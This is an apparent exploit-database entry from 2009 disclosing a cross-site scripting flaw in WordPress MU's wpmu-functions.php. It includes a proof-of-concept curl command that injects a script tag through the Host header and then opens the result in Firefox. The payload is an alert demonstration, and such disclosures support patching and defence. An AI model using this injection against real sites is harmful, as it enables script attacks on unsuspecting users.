id: 9973
date: 11/10/2009
title: WordPress MU 1.2.2 - 1.3.1 'wp-includes/wpmu-functions.php' CSS
author: Juan Galiana Lara
cves: 

================================================================================
WordPress MU 1.2.2 - 1.3.1 'wp-includes/wpmu-functions.php' Cross-Site Scripting Vulnerability
================================================================================

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
 
The following proof of concept is available:
 
curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html



#  0day.today [2023-03-24]  #